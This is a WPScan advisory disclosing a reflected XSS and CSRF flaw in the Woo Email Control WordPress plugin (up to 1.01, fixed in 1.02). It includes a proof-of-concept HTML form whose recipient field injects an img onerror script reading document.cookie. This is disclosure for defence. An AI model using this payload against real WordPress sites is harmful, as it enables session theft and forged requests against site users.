Woo Email Control <= 1.01 - Reflected Cross-Site Scripting (XSS) & CSRF

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Due to a lack of encoding and CSRF mitigation in the test_email function found on line 106 of classes/class-wooctrl.php, it is possible to automate a request to the AJAX handler for the wooctrl_send_test_email action which will reflect the specified script back to the end user.
Proof of Concept
<form method="post" action="http://<target>/wp-admin/admin-ajax.php?action=wooctrl_send_test_email">  
    <input type="text" name="email_class" value="WC_Email_Customer_New_Account">
    <input type="text" name="recipient" value="user@user.com<img src=x onerror=alert(document.cookie)>">
    <input type="submit" value="Test">
</form>  

Affects

Plugin woo-email-control
fixed in version 1.02

References

URL http://blog.rastating.com/woo-email-control-1-01-reflected-xss-disclosure/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Rob Carr
Submitter Website http://blog.rastating.com/
Submitter Twitter iamrastating
Views 179
Verified No
WPVDB ID 8559

Timeline

Publicly Published 2016-07-19 (5 months ago)
Added 2016-07-19 (5 months ago)
Last Updated 2016-07-19 (5 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.